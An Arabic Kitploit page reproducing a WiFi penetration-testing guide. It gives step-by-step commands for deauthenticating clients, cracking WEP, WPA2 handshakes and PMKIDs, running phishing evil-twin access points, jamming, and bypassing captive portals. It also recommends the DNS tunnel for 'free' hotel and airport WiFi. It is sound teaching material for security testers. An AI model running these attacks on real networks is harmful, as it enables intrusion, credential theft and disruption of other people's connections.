Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wifi-pentesting-guide — دليل اختبار اختراق شبكات WiFi | Kitploit
أدوات/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
كسر كلمات المرورتدقيق Wi-Fiجمع المعلوماتما بعد الاستغلالأمن الشبكات اللاسلكيةاختبار الاختراقالهندسة الاجتماعيةالتعلم والتعليم
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

دليل اختبار اختراق شبكات WiFi

عرض المستودع
734113منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

دليل اختبار اختراق شبكات WiFi

الفهرس

  1. الأوامر الأساسية

  2. الشبكات المفتوحة

    2.1. بوابات الأسر

    2.2. هجوم الوسيط

  3. كسر WEP

    3.1. بدون عملاء

  4. كسر WPA2-PSK

    4.1. كسر المصافحة الرباعية

    4.2. هجوم PMKID

    4.3. هجوم بدون نقطة وصول

  5. WPA2-Enterprise

    5.1. نقاط وصول وهمية

    5.2. القوة العمياء

    5.3. طرق EAP المدعومة

  6. هجمات أخرى

    6.1. هجوم Krack وهجوم Frag

    6.2. استخبارات المصادر المفتوحة

    6.3. تشويش WiFi

    6.4. أطر عمل أخرى

  7. ما بعد الاستغلال

    7.1. مهاجمة جهاز التوجيه

    7.2. أنواع الماسحات

    7.3. التزوير



1. الأوامر الأساسية

تعيين متغير بيئة

root@kitploit:~
VARIABLE=value

التحقق من وضع الواجهة

root@kitploit:~
iwconfig $IFACE

التحقق من حالة الواجهة

root@kitploit:~
ifconfig $IFACE

تعيين وضع المراقبة

root@kitploit:~
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

سرد الشبكات

  1. تعيين وضع المراقبة

  2. تشغيل Airodump-ng

root@kitploit:~
airodump-ng $IFACE -c $CHANNEL -e $ESSID

إلغاء المصادقة

  1. عميل واحد فقط
root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. نقطة وصول (= جميع العملاء في نقطة الوصول)
root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

الحصول على SSID المخفي مع عملاء

  1. سرد الشبكات

قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC) وعنوان MAC لأحد العملاء ($CLIENT_MAC). لا توقف الالتقاط.

  1. إلغاء المصادقة

في محطة طرفية أخرى، قم بإلغاء مصادقة عميل أو جميعهم. عندما يلتقط Airodump-ng مصافحة من هذه الشبكة، سيظهر الاسم أو ESSID في المحطة الأولى:

root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

الحصول على SSID المخفي بدون عملاء

  1. سرد الشبكات

قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC). لا توقف الالتقاط.

2.a. تنفيذ هجوم قاموسي

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. أو تنفيذ هجوم بالقوة العمياء

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

بالنسبة لمجموعة الأحرف، يمكن استخدام l (أحرف صغيرة)، u (أحرف كبيرة)، n (أرقام)، c (صغيرة+كبيرة)، m (صغيرة+كبيرة+أرقام) أو a (جميع الأحرف المطبوعة).



2. الشبكات المفتوحة

2.1. بوابات الأسر

2.1.1. بوابات أسر وهمية

  1. استنساخ موقع ويب باستخدام HTTrack

  2. تثبيت Wifiphiser. أضف نتيجة HTTrack في مجلد جديد داخل wifiphisher/data/phishing-pages/new_page/html وملف إعدادات في wifiphisher/data/phishing-pages/new_page/config.ini.

  3. أعد تجميع المشروع باستخدام python setup.py install أو الملف الثنائي في bin.

  4. هذا الأمر يعمل بشكل صحيح في أحدث إصدار من Kali بعد تثبيت hostapd:

root@kitploit:~
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. تجاوز 1: تزوير MAC

الطريقة الأولى لتجاوز بوابة الأسر هي تغيير عنوان MAC الخاص بك إلى عنوان أحد المستخدمين المُصدّق عليهم بالفعل.

  1. امسح الشبكة واحصل على قائمة عناوين IP و MAC. يمكنك استخدام:
  • nmap

  • سكريبت مخصص مثل هذا (Bash) أو هذا (Python)

  1. غير عنوان IP و MAC الخاصين بك. يمكنك استخدام:
  • macchanger

  • سكريبت مخصص مثل هذا (Bash)

أيضًا، يمكنك استخدام سكريبتات لأتمتة العملية مثل:

  • سكريبت Poliva

  • Hackcaptiveportals


2.1.3. تجاوز 2: نفق DNS

الطريقة الثانية هي إنشاء نفق DNS. لهذا، من الضروري أن يكون لديك خادم DNS خاص بك يمكن الوصول إليه. يمكنك استخدام هذه الطريقة لتجاوز بوابة الأسر والحصول على WiFi "مجاني" في الفنادق والمطارات...

  1. تحقق من أن أسماء النطاقات تُحل:
root@kitploit:~
nslookup example.com
  1. أنشئ سجلين DNS (في Digital ocean، Afraid.org...):
  • سجل "A": dns.$DOMAIN يشير إلى $SERVER_IP (مثال: dns.domain.com 139.59.172.117)

  • سجل "NS": hack.$DOMAIN يشير إلى dns.$DOMAIN (مثال: hack.domain.com dns.domain.com)

  1. التنفيذ في الخادم
root@kitploit:~
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. تحقق من عمله بشكل صحيح هنا

  2. التنفيذ في العميل

root@kitploit:~
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. إنشاء النفق
root@kitploit:~
ssh -D 8080 [email protected]

2.2. هجوم الوسيط

بمجرد أن تكون في الشبكة، يمكنك اختبار ما إذا كانت عرضة لهجمات الوسيط.

  1. هجوم تزوير ARP باستخدام Ettercap

  2. استنشاق حركة المرور باستخدام Wireshark أو TCPdump

  3. تحليل حركة المرور باستخدام PCredz (لينكس) أو Network Miner (ويندوز)



3. كسر WEP

  1. بدء الالتقاط
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. تسريع التقاط IV باستخدام المصادقة المزيفة + هجوم إعادة تشغيل طلب ARP + إلغاء مصادقة المستخدم. أوقف Airodump عند حوالي 100.000 IV مختلف
root@kitploit:~
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. كسر كلمة المرور باستخدام Aircrack-ng
root@kitploit:~
aircrack-ng $PCAP_FILE


4. كسر WPA2-PSK

4.1. كسر المصافحة الرباعية

  1. بدء الالتقاط
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. إلغاء مصادقة مستخدم. أوقف التقاط airodump عندما ترى رسالة 'WPA handshake: $MAC'
root@kitploit:~
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. الخيار 1: كسر المصافحة باستخدام Aircrack-ng
root@kitploit:~
aircrack-ng -w $WORDLIST capture.cap

يمكنك الحصول على قوائم كلمات من هنا.

  1. الخيار 2: كسر المصافحة باستخدام Pyrit
root@kitploit:~
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. هجوم PMKID

يمكنك استخدام هذا السكريبت أو اتباع هذه الخطوات:

  1. تثبيت Hcxdumptool و Hcxtool (يمكنك استخدام هذا السكريبت).

  2. إيقاف مدير الشبكة

root@kitploit:~
airmon-ng check kill

3أ. إذا كنت تريد مهاجمة عنوان MAC معين

  • أنشئ ملف نصي ($FILTER_FILE) وأضف عنوان MAC بدون ":". يمكنك استخدام sed وتوجيه الإخراج إلى ملف:
root@kitploit:~
echo $MAC | sed 's/://g' > $FILTER_FILE
  • التقاط PMKID
root@kitploit:~
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. إنشاء $HASH_FILE
root@kitploit:~
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

بنية كل سطر هي: PMKID * عنوان MAC للموجه * المحطة * ESSID (تحقق من: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. كسره باستخدام Hashcat (الخيار 16800)
root@kitploit:~
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. هجوم بدون نقطة وصول

إذا كان لديك وصول إلى جهاز عميل مع تشغيل اتصال WiFi ولكن لا توجد شبكة حولك، فلا يزال بإمكانك مهاجمة تلك الشبكة إذا كان جهاز العميل قد اتصل بها سابقًا.

للقيام بذلك، عليك إنشاء نقطة وصول وهمية باستخدام hostapd مع ملف إعدادات مثل هذا، بأي كلمة مرور ولكن بنفس اسم الشبكة. أنشئ الشبكة المزيفة، سيحاول جهاز العميل الاتصال بها وتحصل على المصافحة الرباعية كما في القسم 4.1 من هذا الدليل.



5. WPA2-Enterprise

5.1 نقاط وصول وهمية

تنزيل الأجهزة الافتراضية

التثبيت المحلي

في حال كنت لا ترغب في استخدام الجهاز الافتراضي، يمكنك تثبيت كل شيء باستخدام:

root@kitploit:~
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd & Freeradius-wpe

ابدأ نقطة الوصول باستخدام:

root@kitploit:~
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

عند اتصال عميل، اقرأ السجلات باستخدام:

root@kitploit:~
sh freeradius_wpe_read.sh

Hostapd-wpe

root@kitploit:~
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 القوة العمياء

  • Airhammer

5.3 طرق EAP المدعومة

البحث عن طرق EAP المدعومة

  • EAP_buster


6. هجمات أخرى

6.1. هجوم Krack وهجوم Frag

هذان هجومان متقدمان اكتشفهما العظيم Mathy Vanhoef:

  • سكريبتات هجوم Krack - موضحة في هذا الموقع

  • سكريبتات هجوم Frag - موضحة في هذا الموقع

6.2. استخبارات المصادر المفتوحة

  • Wigle

6.3. تشويش WiFi

  • Wifijammer - يمكن لهذا البرنامج إرسال حزم إلغاء مصادقة لكل من نقاط الوصول والعملاء.

مثال لإلغاء مصادقة جميع الأجهزة باستثناء نقطة وصول وهمية:

root@kitploit:~
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. أطر عمل أخرى

لينكس:

  • Sniffair
  • Wifi Pumpkin - إطار عمل لهجوم نقاط الوصول المارقة
  • Eaphammer - إطار عمل لنقاط الوصول الوهمية
  • WEF - إطار عمل لأنواع مختلفة من الهجمات لـ WPA/WPA2 و WEP، مع كسر التجزئة التلقائي والمزيد

ويندوز:

  • Acrylic - مفيد لمرحلة الاستطلاع
  • Ekahau - مفيد لتخطيط WiFi
  • Vistumbler - مفيد للقيادة التجسسية


7. ما بعد الاستغلال

بمجرد أن تكون متصلاً بالشبكة

7.1. مهاجمة جهاز التوجيه

  • Routersploit - إطار عمل استغلال للأجهزة المدمجة - اختبر "use scanners/autopwn"

7.2. أنواع الماسحات

  • Nmap/Zenmap - ماسح أمني، ماسح منافذ، وأداة استكشاف شبكات

  • Masscan - الإصدار الأسرع من nmap (يمكن أن يكسر الأشياء، لذا كن حذرًا)

  • Netdiscover - استنشاق ARP. مفيد جدًا إذا كانت الشبكات مجزأة جيدًا

7.3. التزوير

  • Ettercap - تحقق مما إذا كان يمكنك تنفيذ هجوم MitM واستنشاق كل حركة المرور في الشبكة
تنزيل الأداة
نظام التشغيلالمنصةبيانات الدخولالحجمالرابط
Ubuntu 16.04.5VMwarericardojoserf:wifi3.25 GBMEGA
Kali 2019.1VMwareroot:wifi4.99 GBMEGA
Ubuntu 16.04.5VirtualBox (OVA)ricardojoserf:wifi3.18 GBMEGA
Kali 2019.1VirtualBox (OVA)root:wifi5.56 GBMEGA